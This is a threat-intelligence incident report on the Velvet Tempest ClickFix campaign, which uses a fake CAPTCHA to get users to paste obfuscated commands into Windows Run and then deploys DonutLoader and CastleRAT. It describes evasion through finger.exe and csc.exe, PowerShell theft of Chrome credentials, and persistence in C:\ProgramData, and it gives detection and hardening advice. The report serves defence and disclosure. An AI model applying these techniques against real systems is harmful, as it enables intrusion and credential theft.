Full Report
Ransomware threat actors tracked as Velvet Tempest are using the ClickFix technique and legitimate Windows utilities to deploy the DonutLoader malware and the CastleRAT backdoor. [...]
Analysis Summary
# Incident Report: Velvet Tempest "ClickFix" & Termite Ransomware Campaign
## Executive Summary
The threat actor Velvet Tempest (DEV-0504) utilized a "ClickFix" social engineering technique to gain initial access, subsequently deploying DonutLoader and the CastleRAT backdoor. The attack involved sophisticated hands-on-keyboard activity, including credential harvesting and environment profiling, commonly associated with double-extortion ransomware operations. While the observed intrusion terminated prior to encryption, the infrastructure was linked to several high-profile Termite ransomware breaches.
## Incident Details
- **Discovery Date:** February 2026
- **Incident Date:** February 3 – February 16, 2026 (12-day observation period)
- **Affected Organization:** Non-profit organization (Emulated/Replica environment for research)
- **Sector:** Non-Profit / SaaS / Healthcare (based on historical victimology)
- **Geography:** USA and Australia
## Timeline of Events
### Initial Access
- **Date/Time:** February 3, 2026
- **Vector:** Malvertising / Social Engineering (ClickFix)
- **Details:** Victims were presented with a fraudulent "CAPTCHA" or "Fix" prompt. Patients were instructed to copy and paste an obfuscated command into the Windows Run dialog, triggering a malicious PowerShell/CMD chain.
### Lateral Movement
- **Details:** After gaining a foothold, attackers performed Active Directory (AD) reconnaissance and host discovery. They utilized legitimate Windows utilities (Living-off-the-Land) to profile the environment and move between systems.
### Data Exfiltration/Impact
- **Details:** Attackers used a PowerShell script to harvest credentials stored in Google Chrome. While Termite ransomware was not deployed in this specific 12-day window, the campaign is historically linked to data theft and double-extortion.
### Detection & Response
- **How it was discovered:** Observed by MalBeacon researchers through an emulated "honeypot" enterprise environment.
- **Response actions taken:** Monitoring of TTPs, mapping of staging IP addresses to known ransomware infrastructure, and identification of the CastleRAT payload.
## Attack Methodology
- **Initial Access:** ClickFix / CAPTCHA social engineering via malvertising.
- **Persistence:** Python-based components deployed in `C:\ProgramData`.
- **Privilege Escalation:** Credential harvesting via PowerShell scripts targeting browser data.
- **Defense Evasion:** Use of `finger.exe` to fetch payloads; compilation of .NET components via `csc.exe` in temporary directories; nested `cmd.exe` chains.
- **Credential Access:** Harvesting Chrome-stored credentials.
- **Discovery:** AD reconnaissance, environment profiling, and host discovery.
- **Lateral Movement:** Script-based movement and use of legitimate Windows tools.
- **Collection:** Automated scripts for data/credential gathering.
- **Exfiltration:** Staging of tools on actor-controlled IP addresses.
- **Impact:** Deployment of DonutLoader and CastleRAT (often a precursor to Termite ransomware encryption).
## Impact Assessment
- **Financial:** High (Historically linked to Blue Yonder and Genea breaches).
- **Data Breach:** Compromise of user credentials and internal network structure.
- **Operational:** Potential for total business disruption if ransomware encryption is triggered.
- **Reputational:** High risk due to the sensitivity of data in sectors like healthcare (IVF) and SaaS.
## Indicators of Compromise
- **Network:** Staging IP address associated with Termite ransomware (IP defanged: `[REDACTED_IP_ADDRESS]`).
- **File:** `DonutLoader`, `CastleRAT`, archive files disguised as `.pdf`.
- **Behavioral:** Execution of `finger.exe` for external file retrieval; usage of `csc.exe` to compile code in `\Temp\` folders; Windows Run dialog abuse.
## Response Actions
- **Containment:** Isolation of affected endpoints within the emulated environment.
- **Eradication:** Removal of Python persistence scripts in `C:\ProgramData`.
- **Recovery:** Identification of all compromised credentials for enterprise-wide password resets.
## Lessons Learned
- **The Human Element:** Attackers are successfully bypassing technical controls by convincing users to manually execute commands via the "Run" dialog.
- **Utility Abuse:** Standard utilities like `finger.exe` and `csc.exe` remain effective for evasion if not strictly monitored or blocked.
- **Precursor Detection:** Identifying loaders like CastleRAT is critical to preventing the final-stage ransomware deployment.
## Recommendations
- **User Training:** Specifically educate employees on the dangers of "ClickFix" lures and instructions to "Copy/Paste" commands into Windows prompts.
- **Technical Restrictions:** Implement Attack Surface Reduction (ASR) rules to block the execution of obfuscated scripts and monitor/restrict the use of `finger.exe` and `csc.exe`.
- **Endpoint Monitoring:** Heighten alerts for any unauthorized Python-based persistence in `C:\ProgramData`.
- **Credential Protection:** Consider hardware security keys or enhanced browser security policies to prevent the harvesting of stored browser credentials.